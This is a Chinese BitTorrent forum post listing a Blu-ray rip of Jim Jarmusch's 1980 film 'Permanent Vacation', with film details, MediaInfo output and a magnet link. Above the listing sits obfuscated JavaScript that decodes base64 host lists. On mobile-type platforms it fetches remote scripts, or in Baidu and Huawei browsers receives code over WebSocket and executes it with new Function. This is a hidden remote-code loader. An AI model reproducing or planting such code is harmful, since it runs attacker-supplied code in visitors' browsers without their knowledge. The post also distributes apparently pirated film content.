长假漫漫[中文字幕].Permanent.Vacation.1980.1080p.BluRay.x265.10bit.DTS 7.04GB

版主小s 14天前 174

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x62\x50\x73\x42\x6e\x58\x4f\x42\x73\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXlxa2RmODc5Zi5hc2xleXR5LmNvbbSxodHRwczovL29oamZrN2pmMjguZ3Nqemxzc3dzLmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};

◎译  名 长假漫漫 / 漫长假期 / 漫漫长路
◎片  名 Permanent Vacation
◎年  代 1980
◎产  地 美国
◎类  别 剧情
◎语  言 英语
◎上映日期 1980
◎IMDb链接 https://www.imdb.com/title/tt0084488/
◎豆瓣评分 7.5/10 (3016人评价)
◎豆瓣链接 https://movie.douban.com/subject/1299535/
◎片  长 75 分钟
◎导  演 吉姆·贾木许 Jim Jarmusch (id:1041006)
◎编  剧 吉姆·贾木许 Jim Jarmusch (id:1041006)
◎演  员 理查德·伯斯 Richard Boes (id:1066827)
       露丝·博尔顿 Ruth Bolton (id:1063087)
       克里斯·帕克 Chris Parker (id:1422572)
       萨拉·德赖弗 Sara Driver (id:1282723)
       约翰·劳瑞 John Lurie (id:1036957)
       弗兰基·费森 Frankie Faison (id:1019102)
       吉姆·贾木许 Jim Jarmusch (id:1041006)
       吉姆·贾木许 Jim Jarmusch (id:1041006)
       约翰·劳瑞 John Lurie (id:1036957)
       汤姆·迪西罗 Tom DiCillo (id:1022887)
       吉姆·贾木许 Jim Jarmusch (id:1041006)
       萨拉·德赖弗 Sara Driver (id:1282723)
       萨拉·德赖弗 Sara Driver (id:1282723)

◎标  签 美国 / 吉姆·贾木许 / JimJarmusch / 贾木许 / 1980 / 美国电影 / 1980s / 独立电影

◎简  介
  The main character, played by Chris Parker, wanders around a dingy New York atmosphere and is confronted by a number of intriguing characters as he ponders the questions of life, and searches for a better place.

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 3532751558456374941523536855877883177 (0x2A862197A299B7D3C75F7A2E1C11529)

  4. Complete name                            : [email protected].COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 7.04 GiB

  8. Duration                                 : 1 h 14 min

  9. Overall bit rate                         : 13.5 Mb/s

  10. Movie name                               : PERMANENT VACATION

  11. Encoded date                             : UTC 2021-08-31 09:43:08

  12. Writing application                      : mkvmerge v60.0.0 ('Are We Copies?') 64-bit

  13. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4

  14. Cover                                    : Yes

  15. Attachments                              : cover.jpg


  16. Video

  17. ID                                       : 1

  18. Format                                   : HEVC

  19. Format/Info                              : High Efficiency Video Coding

  20. Format profile                           : Main [email protected]@Main

  21. Codec ID                                 : V_MPEGH/ISO/HEVC

  22. Duration                                 : 1 h 14 min

  23. Bit rate                                 : 12.7 Mb/s

  24. Width                                    : 1 440 pixels

  25. Height                                   : 1 080 pixels

  26. Display aspect ratio                     : 4:3

  27. Frame rate mode                          : Constant

  28. Frame rate                               : 23.976 (24000/1001/53354) FPS

  29. Color space                              : YUV

  30. Chroma subsampling                       : 4:2:0

  31. Bit depth                                : 10 bits

  32. Bits/(Pixel*Frame)                       : 0.341

  33. Stream size                              : 6.62 GiB (94%)

  34. Writing library                          : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  35. Encoding settings                        : rc=crf / crf=21.5000 / qcomp=0.70 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.70 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1440x1080 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  36. Default                                  : Yes

  37. Forced                                   : No


  38. Audio

  39. ID                                       : 2

  40. ID in the original source medium         : 4352 (0x1100)

  41. Format                                   : DTS

  42. Format/Info                              : Digital Theater Systems

  43. Codec ID                                 : A_DTS

  44. Duration                                 : 1 h 14 min

  45. Bit rate mode                            : Constant

  46. Bit rate                                 : 768 kb/s

  47. Channel(s)                               : 1 channel

  48. Channel layout                           : C

  49. Sampling rate                            : 48.0 kHz

  50. Frame rate                               : 93.750 FPS (512 SPF)

  51. Bit depth                                : 16 bits

  52. Compression mode                         : Lossy

  53. Stream size                              : 410 MiB (6%)

  54. Language                                 : English

  55. Default                                  : Yes

  56. Forced                                   : No

  57. Original source medium                   : Blu-ray


  58. Text #1

  59. ID                                       : 3

  60. ID in the original source medium         : 4609 (0x1201)

  61. Format                                   : PGS

  62. Muxing mode                              : zlib

  63. Codec ID                                 : S_HDMV/PGS

  64. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  65. Duration                                 : 1 h 8 min

  66. Bit rate                                 : 18.0 kb/s

  67. Count of elements                        : 566

  68. Stream size                              : 8.86 MiB (0%)

  69. Title                                    : chs&eng

  70. Language                                 : Chinese

  71. Default                                  : Yes

  72. Forced                                   : No

  73. Original source medium                   : Blu-ray


  74. Text #2

  75. ID                                       : 4

  76. ID in the original source medium         : 4610 (0x1202)

  77. Format                                   : PGS

  78. Muxing mode                              : zlib

  79. Codec ID                                 : S_HDMV/PGS

  80. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  81. Duration                                 : 1 h 8 min

  82. Bit rate                                 : 18.1 kb/s

  83. Count of elements                        : 566

  84. Stream size                              : 8.92 MiB (0%)

  85. Title                                    : cht&eng

  86. Language                                 : Chinese

  87. Default                                  : No

  88. Forced                                   : No

  89. Original source medium                   : Blu-ray


  90. Text #3

  91. ID                                       : 5

  92. ID in the original source medium         : 4611 (0x1203)

  93. Format                                   : PGS

  94. Muxing mode                              : zlib

  95. Codec ID                                 : S_HDMV/PGS

  96. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  97. Duration                                 : 1 h 8 min

  98. Bit rate                                 : 10.1 kb/s

  99. Count of elements                        : 566

  100. Stream size                              : 4.99 MiB (0%)

  101. Title                                    : chs

  102. Language                                 : Chinese

  103. Default                                  : No

  104. Forced                                   : No

  105. Original source medium                   : Blu-ray


  106. Text #4

  107. ID                                       : 6

  108. ID in the original source medium         : 4612 (0x1204)

  109. Format                                   : PGS

  110. Muxing mode                              : zlib

  111. Codec ID                                 : S_HDMV/PGS

  112. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  113. Duration                                 : 1 h 8 min

  114. Bit rate                                 : 10.3 kb/s

  115. Count of elements                        : 566

  116. Stream size                              : 5.06 MiB (0%)

  117. Title                                    : cht

  118. Language                                 : Chinese

  119. Default                                  : No

  120. Forced                                   : No

  121. Original source medium                   : Blu-ray


  122. Text #5

  123. ID                                       : 7

  124. ID in the original source medium         : 4608 (0x1200)

  125. Format                                   : PGS

  126. Muxing mode                              : zlib

  127. Codec ID                                 : S_HDMV/PGS

  128. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  129. Duration                                 : 1 h 9 min

  130. Bit rate                                 : 14.0 kb/s

  131. Count of elements                        : 834

  132. Stream size                              : 6.98 MiB (0%)

  133. Title                                    : eng

  134. Language                                 : English

  135. Default                                  : No

  136. Forced                                   : No

  137. Original source medium                   : Blu-ray


  138. Menu

  139. 00:00:00.000                             : Chapter 01

  140. 00:06:52.995                             : Chapter 02

  141. 00:13:35.815                             : Chapter 03

  142. 00:22:21.089                             : Chapter 04

  143. 00:33:56.576                             : Chapter 05

  144. 00:40:32.847                             : Chapter 06

  145. 00:50:05.961                             : Chapter 07

  146. 00:56:49.614                             : Chapter 08

  147. 01:03:44.403                             : Chapter 09

  148. 01:11:31.829                             : Chapter 10



TAGS 剧情

磁力链:
  • magnet:?xt=urn:btih:9FEDF4CA898F516CDBB5EECD717EB3E09F527B21
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回